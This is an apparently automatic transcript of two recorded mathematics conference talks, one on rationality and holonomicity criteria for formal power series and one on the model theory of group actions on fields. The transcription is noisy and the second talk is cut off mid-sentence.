vatic conditions are that well we consider the largest radius of meromorphia of the formal power series f we can do this for every place v of the global field and that means that we can express f of x as a quotient of two convergent power series on the vatic disc of given radius rv so I guess I should write sorry I should write mv of f or mv is the largest radius and then the criterion for this the first new theorem on this on the subject but it is a sharp rationality criterion it states that the f is rational just as soon as this whole that the sum of all the logarithms of all the meromorphic adi is greater than this tau invariant that I introduced so when the tau when the coefficients were a-symmetric the right hand side is zero and that's just the familiar condition of braille and vortice you have meromorphic on disks or poly disks whose product of radii strictly exceeds one but so what improves so this this will be just a small improvement after all I will use Andrei's own method but show how a multivariable use of his methods allows to bypass an artificial constant that he had so his theorem proved had a weaker condition certain absolute constant times the tau invariant and this is sharp because conversely now for any collection of such radii of real numbers there is a continuum not just uncountably many but in fact the cardinality is the continuum of a formal power series that are even convergent on those disks and where this this turns out on equality so as soon as we have a strict inequality we have a countably many and in fact all of them are just rational functions this is a complete characterization of rational functions for the so sorry thank you for the question so in I should say yes I I want to consider the radius of meromorph so the lag is the rv is what what we defined the mv of f and the remainder now I turn to holomicity and the results that follow are joint promote work in progress with Frank Kalegai and Yunqing Tang all possible errors in these examples I hope everything is fine but everything that that is not fine is entirely my own responsibility we have also filtered invariants that so I defined the invariant tau of f but for any every integer we can consider a sequence of decreasing numbers by just looking at the string of not not the entire initial string of coefficients of the power series but all coefficients in degrees between these two two multiples of n and then we will have an improvement of the criterion that that is sometimes useful here are some examples the polylogarithmic series have a tau invariant equal to k but indeed this sequence of filtered invariants is strictly decreasing to zero the tau r of the kth polylogarithmic series is just the asymptotic density of the primes up to n that divide some number in the range that we use that range comes up in in the Zigo lemma proof in a similar similar way to the profile sketch of the first criterion and however this modification will have tau equal to k for all k and r so the sequence will not decrease so we we work in a more general setting that this follows andres approach that we can call simultaneous simultaneous neomorphic uniformization we don't instead of asking for f of x to be neomorphic on a disk of a given radius we will ask for both x of z and f of x of z to be to be neomorphic on on a disk in the z plane and I will use notation for the polydisk of radius rv in this sense that the it is an equalized polydisk we take the same radius for all the coordinates and the obvious extension of my notation with these invariants in the multivagant setting using the total dp and as we look at the growth rate of the vector of coefficients of tot of a bounded total dp I apologize I should follow the chart okay there is nothing new and here is the setting that we all the remaining criteria are placed we look at the radius for each place of v and a holomorphic mapping that's just a convergent power series for every place into the into cv to the d it's from the d dimensional polydisk with this normalization that is all I ask of the map this is like a substitution but it should be normalized to have a unit derivative at the origin otherwise it has just transcendental coefficients and also we ask that it should be this is very important for for the criterion it should be trivial for all but finally many v x v of z is just the identity for all but finally many v I will call this an adelic template because I will be interested to to fill the solutions of this template and by that I mean the solutions will be the formal power series in the variables with this property that when you do the substitution f of x of z at every place and then look at the z plane or in the dimensional polydisk then we get a germ of a meromorph function on that polydisk but I also again stress that I allow this f of x of z to be meromorphic in z but I insist and that is will be a crucial restriction because Andres method is more general I insist x of z to be holomorphic in z and then the basic problem will be to to describe all the solutions of this for given data this is the starting datum and then to find all the formal power series with these properties subject to denominator constraint for example on the invagans tau of f of the more precise denominator information for f in this language the rationality theorem is expressed like like this if we take let's this limit to dimension one here so and then we take x of z to be z of every place with some radius rv and then all the formal solutions of this inequality time variance more than the sum of the logs of all the radii precisely the rational power series we complement this by dropping this restriction that the substitutions are all the identity and now we are we can make any substitution which is holomorphic such that f of x of z is meromorphic on at every place v and now if this and then we also relax the condition a bit to the sum of the logs of all the radii the total arithmetic degree that we have to be strictly larger than the tau infinity filtered invariant so this is the limit of all the tau r if this is confusing then just put tau of f here that would be a special case and so the simplest version of the theorem states that such formal power series are necessarily defined power series they are holonomic functions and they are solutions of linear differential equations over the function field k of x I state a special case of the main delfantin criterion in Andrei's book with a mild invariant to the filter invariant that I point out and in our notation I must stress it is very important to additionally assume the set of places in the criterion must be finite otherwise actually the proof breaks down and it treats this way suppose we have these substitutions additionally I will have a second bit of notation to denote the maximum sv of the absolute value of x on the disc on the polydisk so we suppose we have holomorphic mappings that send the polydisk radius rv to the polydisk radius sv of course s must be at least r just by Schwarz's lemma and if x equals z then we have the equality and then Andrei's delfantin criterion gives linear relationship over the function field it states that if there is a parameter kappa that arises similarly in serial lemma the slides actually the extended slides indicate the full proof of this criterion taken from Andrei's book but I will just indicate the choices of the parameters involved if this holds for some kappa then the template problem simultaneous uniformization problem has at most n minus 1 independent solutions over the function field again it is a similar kind of inequality if you like it's also possible to include mod p conditions reducing also the power series that some of the primes like we had in the first criterion the parameter sorry yes I missed what this tau k when you have m functions for the tau oh yes it is defined just by taking the totality of all the coefficients of the entire vector of the mod x to the n truncations for all the power series that's a point in some huge projective space and then we take the height so defined in the same way and I just want to convey the intuition for the parameters involved this is how Andrei's in a condition looks like we will be interested to remove the dependence in kappa that is completely obstructs applications but the essential condition really is this the absolute potential positivity condition without it we have just uncountably many formal solutions with it we have very easily just countably many formal solutions and we would like to see some structure about them the proof is by transcendence methods we just like before we use Ziko's lemma to construct an auxiliary linear form in the functions where the qi will be polynomials and the combination we just want to give an approximate linear relation the combination will vanish highly at the origin and the polynomials will have heights bounded proportionally to kappa times h kappa will be the deflex exponent in the Ziko lemma and the height of I mean the height of the vector of formal functions fi and then of course there will be a parameter of a parameter that will go to infinity I mean the proportionality parameter the degrees of the polynomials will be bounded by this proportional to this and that is where this term will come from from the parameter count but we can't really get rid of that kappa it comes there is an optimal choice that it's a mess that to equalize the two terms with kappa and finally this term will come from estimating the polynomials on on the polydisk so we need a growth information both on the x of z as well as on the functions f of x and then I have essentially the full indications of the proof on the on the next few slides I think I should just leave okay just just display Ziko's lemma the the full statement works like this we have a parameter count we have to solve that many linear equations in that many coefficients and as soon as n exceeds the number of equations we will have a solution then we make an additional make this choice to to get a bound on the height and this is where kappa will come from but and the rest will be actually that is taken from Andres book so let me from now but move to the move on to the proofs of the new parts the rationality criterion is a multivariate application of Andres criterion again here we take the basic case where x of z is trivial we introduce the auxiliary new variables like in Roth's method and that will improve the parameter count in Ziko's lemma so I will denote the block of variables by by this x and out of the original univariate power series we build a bunch actually quite a few of them super exponentially many of them of new power series the crucial point is to take the split variable disjoint disjoint variable product of f evaluated on products of pairs of polynomials so I arrange this ranges over subset of pairwise disjoint pairs ij of indices their number is clearly exponential in this square and the crucial point is that is super exponential in d because we if we take all right if we take tau of a power of f it just in just one variable this increases and can get as large as the original tau plus term like like this but unless tau is equal to zero but for disjoint variables we always have this if you take a new power series a power series in x1 multiplied by power series in x2 and so forth the tau never increases so additionally when we do change f of x to f of x times y the height as well as the radii will scale by the same factor completely proportionally by factor of one half so we have this as well and then andre's condition becomes the following and we can now firstly take kappa to zero that will kill this term and then we will take d to infinity and it will because m was super exponentially large in d and will also kill this term and what survives is just the essential condition that we have proved already supplies rationality but this was in the case where all the substitutions were just trivial x of z equal to z the proof also immediately shows the first part the qualitative part of the holonomistic theorem actually that already follows from andre's criterion because we can take enough sufficiently many derivatives in andre's criterion that never changes the invariant style or the height of the power series and we can just kill the the additional terms we can take kappa to zero and then sufficiently many derivatives will make the third term in andre's criterion also go to zero however we have the following quantitative estimate on the order of the differential equation this is how it reads not only are the solutions of our problem the formal power series f satisfying these substitutions on the relativistic conditions not only are they holonomic but also but in fact they satisfy a linear differential equation I take the inhomogeneous form there exists a differential operator l of order r minus 1 such that l applied to f is just a polynomial where and the bound on r can be taken it is explicitly in terms of all the invariants that we have as soon as r satisfies this inequality then then the rank of holonomicity will be bounded by will be in fact smaller than r and a variant will be if we restrict the denominator types more precisely let's consider rational coefficients for the power series and suppose we have a real number s and an integer t such that all the coefficients when multiplied by the least common multiple of the integers up to sn and then raised to the t power are as integral where the finite set of places can can be allowed to depend on f we do not fix it in advance so this is the situation where tau is bounded by s times t but we have a specific behavior for the denominators then the version of the criterion states that the same condition entails a finite dimension okay a dimension bound by this quantity on the linear span of all the solutions so they just range from not only they are holonomic but the totality of them has a finite dimensional span there are just essentially finitely many operate differential equations involved the proof is works similarly by additional variables where we replace the original variety that was the affine line by the dth power and we will take the asymptotic the number of variables to vote infinity this time we cannot use a super exponential number of new power series because that no longer applies if x of z is not the trivial substitution this will no longer be analytic on the radius of square root of r the best we can do is to just take the disjoint variable products just of the power series and their derivatives and that way we can generate exponentially many exponentially many auxiliary solutions in d variables out of the original univariate polynomial the key input is that when we take disjoint like split variables product like this f of x times g of y and the variables are disjoint these two invariants the height and tau will not increase and the the proof then works very similarly suppose for contradiction we have these derivatives are linearly independent over the function field k of x and then for some are satisfying um andre's condition then we will consider the r to the d new power series out of the original ones by just taking derivatives that does not change and does not change the infargence and multiplying in split in disjoint variable products and then and then this choice of the substitution just calling just the Cartesian power of the univariate one in this procedure the term from the ego's lemma the kappa will disappear if we let d to infinity and then uh the resulting inequality is exactly the contradiction is exactly the opposite that is I will uh I wanted to stress that the proof involves uh crucially the holomorphi of x and z we can uh andre's criterion is nonetheless more general it applies to uh meromorphic substitutions as well so this improvement is not always possible to just remove the parameter kappa incomplete generality there was a not obviously related paper by Zudelin in a journal basically in a different field apparently constructive approximation theory a couple of years ago and the title of the paper is a determinant approach to irrationality where he essentially gave rationality criterion in of the of a similar kind and this is a particular case of our setting his criterion looks like this uh we have a formal power series with rational coefficients uh we suppose it is um analytic say holomorphic on a slit plane c minus this branch curve from minus infinity to minus r but because of the Riemann map uh for for that simply connected domain that is explicit here that condition is exactly equivalent to convergence when you make this substitution so that that places his uh this in our setting uh and also to uh suppose f has unit uh piadika radii i mean convergent on the piadic unit disc for all points p and finally that the total arithmetic degree the sum of logs of all those radii is bigger than three halves times the tau invariant then Zudelin proves that uh f is a rational function um and there are examples like the logarithm series for example log of one plus x uh is um uh not rational it has to be holonomic because because of the holonomist the theorem uh because um uh and because tau of the power series f is equal to one and that is smaller than log four uh and uh this shows that uh there must we cannot have an algebraic uh conclusion in general we we can uh uh at best have holonomicity uh and it remains an open problem to find the best constant in Zudelin's criterion it is somewhere between 1.5 and log four um there is another uh case uh where uh we can solve the uh problem precisely and that will be similar criterion to Zudelin's um to this to precisely describe uh which holonomic functions arise in in a special case of of this setting uh let me directly just take uh point out uh this case take the prime two and uh this hypergeometric function that it just reduces to essentially the arc sine function uh that has um a two-adic radius uh as as high as four um this this combination although the arc sine uh although um if we uh so this is equivalent to taking this function uh and this is a holonomic function it satisfies uh linear differential equation of order one in homogeneous uh and with singularities only at zero one and infinity the two individual factors this and this have two-adic radii as small as a quarter their product has a two-adic radius as high as four sixteen times as big um the Taylor series of the function has denominated has denominator type is we take the least common multiple of the first n denominators it divides this it is essentially this uh and so does this function uh modifying h by the substitution x over x minus one um so we are in a position to fully determine all functions with with these properties so i will just state another case uh where we have a precise characterization of the solution space uh it states like the following we take a power series uh with rational coefficients such that it converges on the two-adic disc of radius four uh and on the p-adic disc of unit radius second uh the if we take the nth coefficient multiplied by the least common multiple of the first two n plus one integers uh we get uh an s integer uh where uh s can depend on the function f and third uh they're up to multiplying the power series by some polynomial non-zero uh there is a linear differential equation l of f equal to zero for some linear differential operator with singularities uh close enough to either zero one or infinity uh which were the singularities for this function then uh any such function is just a rational linear combination with q of x combination of those three we have a three-dimensional space of solutions with the basis uh given given like this uh there are not many cases where we can get an exact characterization and uh i think i should uh all right so my slides also include the proof uh outline of this as well as the application to rationality of the of the two-adic zeta value that i uh did not have time to discuss um so it is what it was with uh such applications in mind that this was uh these criteria are developed um i think uh i i get to the uh i'm out of time at this point so i should um i want to thank everybody for for your attention on the wonderful conference okay uh feel free to unmute yourself and and applaud some people are putting little hands in whatever that is yeah that's cool uh are there any questions can you say how your um how your thing results would relate to uh Sonye's results and strength for for ruch's conjecture where um oh the one uh yeah if i go back i think i can do it just just like that on the first slide basically the two slides are exactly of the same strength actually i would say uh if you recall this paper he had um constant like uh e to the i think three minus two root two something like this he proved that if we have um a linear recurrent uh if sorry if we have a sequence of integers uh such that the reduction mod p is uh satisfied a linear recurrence delay equation mod p of uh a length less than p uh and the growth rate uh was smaller than this then uh the sequence satisfies a linear relation so the and if you optimize kappa in this display it gives exactly the same constant i would say this is the same result uh as i stated the one variable proof uh optimizes to Sonye's quantitative result exactly all improvements come from for more variables and similarly in Andrei's book there is a related constant for uh i i stated um his uh sorry um his rationality theorem is stated under the conditions this some of the law talks of mermorphic radii exceed basically the same kind of constant i wrote 12 but in fact he he the optimal constant is i think x of two times that the same three minus two root two something like this times the tau invariant but uh again it is possible to mix the two types of criteria if that is useful i would be very happy to know if there are more applications if they come up useful for other things uh you can add mod p conditions and um uh the attic analytic conditions at the same time can i ask a question sure hi i i'm uh i'm you probably i don't know if this is a bad question or not but i would be interested in actually trying to use this criteria or trying to apply it so it can it be is it practical to try to make it effective you gave an example on a function which was somehow already known and it was hyper geometric but what what kind of format of function do i need to be actually try to make it effective if i actually like i would really love to try to use this yeah so i think you have in mind the the holonomistic criteria with oh yeah the whole yeah sorry sorry i should jump ahead sorry i had it in my head in the about the teaching five minutes so i uh right right no that's a great question that's exactly what we uh we we try to do in some cases there are potential applications where if you can describe completely the solution space we just give um semi semi effective result with some dimension bound but we really have a finite dimensional space and we can't describe it effectively this is somehow uh i apologize for the comparison but i think it's a little similar to to isiga rope where you have a bound on the number of solutions but finding them effective is hard by the method that you need some anchors some extremely good examples like in bombilla effective three methods to start with uh and this was just an example where uh the arc sign example or this hyper geometric case where it was possible yeah because we uh we have an excellent two-adic radius uh in this case and we started with three solutions uh that are real solutions and they they somehow are enough um to to bootstrap to to know solutions you you can find some indications on the slides that are posted on the workshop but the short answer is we would very much love to do it in more more interesting cases okay thank you but can you see it in some sense it's just being a very general like paulia kirlson type theorem or something like this is it you mean again um are you interested uh referring to the holonomist twist not just uh yeah i mean you don't yeah you're getting logs log one plus x and things like this mm-hmm yes already in zutilin i think zutilin's work was the first extension of this kind because if you yeah we have seen that holonomicity holds even without this coefficient of 1.5 but then it we really have holonomic solutions not rational and we have a criterion for holonomicity up to given given order that is the what is used in in the application to transcendence we don't know the best constant here in this gap but i don't i don't know if we can apply the holonomistic criterion to uh orbit growth lower bounds in a similar way like irrationality the irrationality criterion gives uh for example a height lower bound on holonomic functions uh for example the height must be positive if uh the function is not rational of the special form some polynomial over one minus x to the power uh i guess uh cyclotomics product like that i don't know if the holonomistic criterion has similar strength stronger consequence are there other questions for vessel if not let's thank vessel in again i've got to figure out how to stop recording somehow i uh let's see it's still recording right now um there's supposed to be a button um oh wait a minute maybe i see the button now here we go i was on the wrong page stop um um so let me go back into
I will present in detail a new twist in the subject of arithmetic algebraization theorems. It comes out of a joint work in progress with Frank Calegari and Yunqing Tang on irrational periods, and bears also a relation to a variation by Zudilin around the classical Polya-Bertrandias determinantal criterion for the rationality of a formal function on the projective line. Time permitting, I will sketch an application to an irrationality proof of the 2-adic avatar of $\zeta(5)$.
10.14288/1.0397421 (DOI)
So it is my honor to introduce Peter Kowalski from University of Tvatslavsk, who will talk about the Lottery of Group Actions on Fields. Thanks a lot, Mascha. Thanks to the organizers for inviting me to give a talk here. Well, it's actually my first ever conference online. So well, I like the talks. It's useful for me. So thanks also for the invitation, so I have opportunity to listen to all these good talks. Okay, I am a bit nervous for two reasons. First, I never gave a conference talk like this. Second, all these nice talks I heard were also nicely into the main topic of the conference. And my talk doesn't seem to be like this. So in many conferences, the main topic is kind of used often like an excuse to talk about things not so much related to it, which doesn't seem to be the case with this conference, but it is the case with my talk. So I'm sorry for the people who will maybe not find it so interesting because of that, but maybe it will be still entertaining. Okay, right. It's moving. So here I'm trying on this slide still to connect it to the topic of the conference, the algebraic dynamics. So as we saw on several talks, in several talks, fine, moderate theoretical analysis of some particular theories. This is a theory of differential fields and theory of difference fields, actually. The trichotomy results there often have applications to the fundamental problems, or to dynamical problems. So I'm saying here, maybe you can see the drilling cups there. So I'm sorry. So I'm saying here that this model theoretic approach to algebraic dynamics often goes through particular analysis of particular theory, and most naturally affects the order theory of difference fields, fields with endomorphisms, which is ACFA, this particular theory. And this approach was fruitful, as we notice in this conference as well. There are dynamical results of Shostakovich-Koszalski, Medvedev-Skanlon and Adek's, which use this model theoretic analysis. Okay, then I'm getting closer to my topic. So in the opposite difference fields, the ones where endomorphism is automorphism is invertible. They are the same as actions of a particular group of groups set by a given field. Yes, choice of automorphism is the same as choice of the action of a group on one generator. So this is about ACFA, let's say. So in my talk, I just replace set by arbitrary group, and then look what is the corresponding model theory. Is it nice, does it exist at all in a way? Okay, so ACFA is like a nice theory of difference fields. It's a theory of large difference fields. I will make it precise soon. So actually for any for arbitrary group, the first question is whether this nice theory exists at all. And this will be kind of the main topic here. Okay, and this is an icon see three kinds of groups. This is joint work with Oslo and Bayekslern in the case of each of the three groups and action groups. And we've done a Hoffman in the case of finite groups, which are of course special case of each of the three groups, but it's like that. So the list is the list of co-autogies alphabetical and anti-honological. It was back with Daniel, then with Oslo. Okay, so now I'm going to tell you, okay, so what is the setup? Ha, just some terminology. So we have this fixed group G, which will act on fields. And I just say a G field short name to a field together with action of G by field automorphisms. Like we have G sets, so let's say we have G fields, here to an action of G prescribing related to the structure of the field. So then we have natural notions. If we have two fields, we have action of G, we can have a equivalent extension. This I will call G field extension. There is also natural notion of G ring, which link extension, etc. So everywhere like a normal notion, but with compatible group action. Okay, and then we look at it as a fixed order structure. So what does it mean? So like a ring is a fixed order structure because you specify two or three binary operations and two constants, plus minus times zero one. I have also action of G, so I make it a fixed order structure by adding one unitary function, which I also call G by any element little G from capital G acting on my K. Yes, like vector space, like vector space is a fixed order structure because we have a function for all scalar multiplications. So just for malty, this may be slightly confusing, this little G, I don't want to distinguish, but formally it's supposed to represent trippings at the same time, element from the group, a function, this is how the group acts, and also formal function symbol, which is a which is in a given G field, it has particular identification as this as this function. Okay, and of course, if there are copies, for example, that, and it is not very smart to look at all elements of that, that would correspond to looking at some automorphous sigma and also adding to language all its powers, so of course we don't do that. So it's often convenient to consider the language where only a useful set of generators is specified. So for example, for difference fields, we just look at one automorphous sigma. So we may think about the sigma as a chosen generator of infinite cyclic group set. So in practice, usually we don't look at all these elements of group, we just look at some convenient, convenient set of generators. So this is how we look at actions on fields for a fixed group, how we look at actions of this fixed group on fields in a fair-storied way. And then I think I want to specify case here, so I get this ACFA, I said it's a nice theory of large different fields. So now I want to say what does it mean to be large in general. And actually it's a very, very general definition in any theory. But in the case of G fields, it's amounts to saying that all solvable difference polynomial equations have solutions. So first what is here a difference G polynomial equation. So I just take a system, let's say n is always the same, but to have too many indexes, it will not make any difference. So I take a finite number of elements of this group G acting on K, finite numbers of polynomials over K, and some finite numbers of variables. And I plug the results of the action of G to variables to this polynomials. So in this way I get a system of difference equations related to this action of group G. So these are my difference polynomial G polynomial equations, which in a large G field, they should have always solutions. What does it mean? Of course, there are some equations which are obviously contradictory. And actually what does it mean is the biggest issue here. So the formal name of large here is existentially closed, abbreviated EC. Existentially means that the formula I'm looking at is exist x v of x, and this v has no quantifiers. So here it is existentially closed. If any system like this of difference polynomial equations, which is solvable, has already solution in K. And what does solvable mean? Well, the most natural thing that it can be solved in some G field extension, OK, some more to be linked. OK, so it's test definition. I think everything is very unnatural. Such equation is solvable if it can be solved some more abstracts. And the field is large if it's essentially closed. If it can be solved upstairs, it can be already solved in the field. OK, so these are my large, large G fields. That's the definition. Now I think several comments about them. Do they exist? Yes, it's a very general thing. It's the same even easier if you construct algebraic closure of a field to kind of formulate solutions. OK, and then you have some inductive process and you get your algebraic closed field. The same with this essentially closed G fields. Also you know if there is a solvable difference equation, it has a solution somewhere. So you add this solution on this bigger field. And the only possible problem is to get the limits, to get to the unions, unions of this extension. So for that, one has to know that the union of G fields is a G field, which is obviously true. So it's a general property of inductive theories. Inductive means that union of models is a model that in this case, energy field has a large, existentially closed G field extension. So they definitely exist. The question is, what are they? If the action is trivial, then we just have fields. So then there's equations like polynomial equations. And it's exactly Hilbert's most analysis or its weak version about the domain version of it, telling you that the class of existentially closed fields is exactly the class of algebraically closed fields. So that's the description as it should be in the case of different fields. So the action of Z, then we're going back to the original theory, the class of existentially closed Z fields coincides with quite classical now, transformally or different closed fields. So models of this nice ACFA, yes, which we have many results about, which is some application dynamics. Okay, now something to be careful. So it happens that any model of ACFA as a pure field, it is algebraically closed. However, it is rather unusual for other groups, for most of the groups, it is not true. There is actually a criterion, I can tell you later if somebody asks. So usually for other groups, usually existentially closed G field is not algebraically closed as a field, which should not be very surprising by art and Schreyer theorem. If you have finite group, well, which is, which has more than two elements, it's cannot faithfully act on algebraically closed fields. So you don't even have reasonable G fields at all there when the basic field is algebraically closed. So it should not be surprising that the existentially closed models are usually not algebraically closed fields. Okay, it's good to have it in mind. Okay, so then one can ask, okay, but we have this one example that we have the complex field with complex conjugation complex conjugation is of course, order two, in the value of automorphism. So this pair is the same as action of C2 by CN. I mean cyclic group of order N. Okay, let me adopt this notation. So complex field with complex conjugation is actually also not an existentially closed field, I can just say why. So okay, I have to find a solvable, a solvable difference C2 polynomial, which has no solution in the C with conjugation. And the polynomial is saying that absolute value is minus one. Yes, absolute value of Z is Z times sigma of Z. So this is difference equation. Obviously, you cannot solve it. It cannot be minus one in C, but it's rather easy to find extension C2 extension to the field of rational functions where it can be solved. So the C with complex conjugation is not large as a C2 field. Okay, so basically if you have finite group which is non trivial, G, then existentially closed G field is never algebraically closed. Okay, so this was some information about this large, large G fields. Looking great, no questions so far. But if you have any question, please ask either in any way you like. So they are not large in the sense of being algebraically closed, but still the underlying fields of existentially closed G fields are still kind of large. So I'm saying they are pseudo-algebraically closed. So first for any G field, we also specify its sub-field of invariance denoted by C like constants. Okay, it's also often confusing. Of course, if G is finely generated, it is definable, but if it's not, it is not definable anymore. It's definable as infinite intersection. So we call it tight definable. Let me recall that field is pseudo-algebraically closed PAC if any absolutely reducible variety over it has a rational point. So then I want to say, as last general information about existentially closed G fields, that they are always perfect PAC. And if it so happens that G is finely generated, so this constants become definable, then it is plus PAC as well. So this we have, this kind of largeness we have, but for algebraically closed, we cannot usually hope. So now I still didn't get to this theory, what should be nice theory of them. So that's again a special instance of general definition. So if there is effects of the theory, so if there is a set of sentences in this language I specified, sentence means you can use quantifiers, finitely many, conjunction, disjunction, negation, finitely many, and the structure I specified before to say something. So if there is effects of the theory whose models are exactly existential articles G fields, then we call this theory GTCF, and this is our nice theory to study further. And this is an instance of general construction of model companion in model theory. So if it exists, it's a model companion of the theory of G fields. So maybe for non-model tourists, let me go back one could wonder why this definition here is already not giving me my theory. So let's focus a bit. If we fix this formula here, the system of equation, then we have a condition. We have a mathematical condition saying something about solution and solvability, but this is very, very much not fixed order. We are quantifying here over all possible G field extensions of K. So we cannot express it as such. We cannot express it as something fixed order. We are not allowed to say in this language for all possible G field extensions. This is not fixed order formula. So actually the issue here is to find something fixed order which specifies which systems are actually solvable. And this is actually very non-s trivial issue. So I'm back here. So let's see some examples. If the group is trivial, well, the nice is essentially closed fields then algebraic closed fields. This theory is basically ACF, the theory of algebraic closed fields. If the group is free, like with one generator, it is Z, we get ACFA. With M generators, it also exists and it's called ACFAM. If group is finite, OK, then there is a little story behind. I don't have time to tell it exactly. So we wrote this paper with Daniel Hoffman and at the very end of it, I was always surprised that nobody ever picked up this natural topic of looking at finite group action on fields in a more theoretical way. And it turned out somebody did 10 years before. I guess he wrote something like PhD thesis and then I think left mathematics. I only state as a PhD thesis and it was brought to our attention by Zoe. So actually there is a large intersection in these two papers. So anyway, that's the story. So about the theory of existence, if G is finite, then GTCF exists. And now, OK, now is the moment when you may notice things are not quite clear. What is the general picture? Krasowski showed that Z times Z this year does not exist. So if you take a very natural theory of fields with two commuting, as actions of Z times Z, Z times Z are just two commuting automorphisms. So if you take a very natural theory like this, then you cannot axiomatize large models. You cannot axiomatize existentially closed, existentially closed different fields like this, which may be slightly surprising, but it is true. Yes, so if you think about which groups are good in this sense, when this theory is axiomatizable, then it's quite hard to say anything so far. Finite ones are good, free are good, free abelian are not good. So the main topic of today is somehow to understand which groups are good in the sense, which ones have axiomatizable theory of big G fields. So I guess this is the last slide of introduction. So now I plan to talk about finite group actions. But a bit confusingly, I'm starting as an actions of Z. This is like the initial example of geometric axioms here. So let me specify this axioms of ACFA. So now we turn this to different equations. We look at them geometrically. So we have kind of graphs, yes, for any variety over k. So by variety, I always mean F and k variety, k reduced, finite type. So it's the same as prime ideal in the ring of polynomials of finite many variables over k. If I have such a prime ideal, I can hit it by sigma. So from v, get new variety sigma v, which is also appropriate for fiber product. And then I have morphism between k rational points. So actually any G polynomial equation, well, any different equation, system of difference equation, I can understand as intersecting graph of such a function with some subvarieties of the product. So we have to say kind of which pairs of varieties like this give solvable systems of different equations. And that's exactly the geometric axioms of Z and UD. So it says that if we have a, let me make experiment and draw something. Any other ideas? So if we have v sigma v, here we have graph of this sigma v. Here we have our w, projecting generically here and here. Then there should be this point in the intersection a sigma of a. Sorry for my perfect drawing. Okay, so I think this picture should be rather clear. So that's the axioms, the axioms says that we can always focus W, which projects generically on both coordinates. We have such a point in the graph in the site. Okay, so now I want to find the directions of these axioms or other types of groups, not for Z. What to do with that? I guess I should ask you to, so you also the picture, it will vanish now. Is it a faster way to do that? Anyway, it will happen. Okay, so this was the axioms of ACFA. Now what happens for finite? Okay, so, question, question. I'm reading, I'm reading. How does it seem to be? So I'm reading the question, how does this GTCF behaves if Z is replaced by a finite index subgroup or a large? Yes, yes, it will be answered to some extent when I get to virtual finite groups. So, general answer is that only after analyzing particular class of groups, one can posteriorly get such conclusions. But I cannot get any, I do not have any general theorems saying anything for such a general question. So the question is, okay, if I have something good happens for G, does it also happen for a finite index subgroup or a finite index supergroup? In general, I cannot say so, just after analyzing, just after analyzing a particular class, we will see it very soon. I was all, yeah, but not actually, it's not easy to get such conclusions. Huh, okay, so this was example of geometric axioms. Now there was one more other kind of possible axioms. So this fields C and K, K and the fixed field, they have some color-wateretic properties. In this case, K is just algebraically closed, but since it should be a finite, besides being perfect PAC, the absolute color-water group is Z hat, which means by ax, C is to the finite. So one can ask, does this imply existentially closed and not? So in, I'm not sure about proper credits, but in the book of Richard, actually it's written that for, with probability one, if you take automorphism of Q-arch, then it satisfies these two items, but it's never a model of ACFA. Models of ACFA, characteristic zero, have infinite transcendence degree over Q. Okay, so I would say and formalize it at the very end that ACA is not axiomatized by Galois axioms. You need this geometric axiomatization, okay? I will get to this later. So for finite groups, okay, if you remember axioms for ACFA, then from finite groups, we did something similar with Daniel, but now, okay, ACFA has, we have just one automorphism, like one specific generator called Z. Now I just look for the entire group G as my set of generators. So my W is in the product of V, hit by all elements of the group. So I'm basically asking when this W gives a solvable difference equation. So still all projections should be dominant, but the group is not free. I mean, it has a multiplication table. So this W should respect this table. I call it the iterativity condition, referring to iterative Hasselschmidt derivation, because kind of some other topic, iterative Hasselschmidt derivations, I controlled about finite group schemes. Here also finite group schemes, very different one, but there is something in common, so I call it iterativity. Well, as you can see, if we apply this GI to W, then we get into another product, but of course, there is always some up, just not a projection, which is a peg mutation by this GI. So it should on W, these two things should have the same image. That means that kind of W sits relatively inside and gives you solvable, solvable system of G equations, and then the same conclusion. There is a solution here such that now this table, when we apply the elements from the group acting on K on this variety V, then it is in our solution set W. So it's like ACFA axioms, but with this extra, with this extra iterativity condition corresponding to the fact that our group is not free anymore. Yes, it should respect the relations that group has. So this is geometric axioms for finite GTF, and also actually Galois axioms are also enough, what are Galois axioms saying now? Both fields are PAC, maybe not Galois, but they feel strict, meaning also the same terminology as for Hassel Schmidt, that the action is faithful. But the last one about Galois groups, the restriction map from the absolute Galois group, so C-alge over C to K over C, which can be defined by G by this thickness, this thickness is so-called Fratini cover, so it is onto, but it's not onto on any proper closed subgroup. Okay, such maps, continuous maps between provided groups are called Fratini covers. So essentially closed GTFs have all these, the suspect's not like a property because this Galois group is actually bounded, it can be shown, and actually the converse also holds. If you have a Gt satisfying called that, it is existentially closed. So I would say, I'm saying that it's also GTF, it's axiomatized by Galois axioms as well. Okay, I will just quickly say, so ACFA, it was important that ACFA fits nicely to this stability, stability or simplicity character. It is simple, let's just think it is nice, model telemetrically. How about GTF? Okay, they are really by interpretable with the cube field C of the constants, because it's a finite extension and everything is definable in C. Since C is PAC and bounded, it is super simple of S rank one, and then GTCF becomes super simple of S rank E. ACFA is also super simple, but the rank omega of infinite rank. So it is kind of nice, but it all, all the structure actually comes from the field. So it's really about talking about model theory of one PAC with C. Okay, and we got something, but that's really only for model theorists. I guess slight improvement of a general theory that it has elimination of imaginaries after getting finitely many extra constants. I think in general, Anand and Zoë showed it with infinitely many constants, but I don't want to stop on this too much. Since unfortunately I have two more sections. Okay, so we are done with finite groups. So joined to work with Daniel. Now the fact with Oslem. Okay, we were thinking, can we somehow put model theory of actions of free groups and model theory of actions of finite groups in some ambient, ambient joint context? Well, and there is a very natural class of groups for such generalizations. So this refers a bit to Serge's question. There are virtually free groups. So groups having a finite index subgroup, which is free. So in this practical case, the answer is yes. Yes, so if we, as we will see, it will be also axiomatizable, but the way it is done, okay, it's really not somehow using it. You will see how it is done, but it really cannot be, the way it's done cannot be generalized to any situation like this, in abstract situation like this. Okay, so our axiomatization, we will axiomatize this action. So literally free groups is in a way that the geometric, it's not a color, axiom is the actual metric. So axioms are geometric themselves as per a CFA, but they use the geometry, which is underlying a given virtuality group in the sense of geometric, geometric group theory. It was crucial, we thought this would not, we wouldn't be able to do anything. This geometric description of literally free groups was crucial for us. So the theorem is this classical theorem, that if we have literally free, sorry, if we have finite generated group, then it is literally free, if and only if it decides to morph it to the fundamental group of a finite graph of finite groups. I don't, I will explain later more, but what does it mean? Okay, it means, okay, so first you take finite groups and you can take three products, but also with an algorithm. So actually think about the tree where vertices, where yes, vertices, in each vertex, there is a finite group sitting and on edge, there is a finite group sitting, which embeds, which embeds onto this vertex group. So you can amalgamate, you can amalgamate the whole situation, you can take three product with amalgamation as the tree tells you to do it. Okay, so that's the facts part, but your finite graph may have also another, another, it may not be, need not be a tree. So there may be some loops remaining, even loops around one vertex. And for all these remaining loops, you have to do corresponding 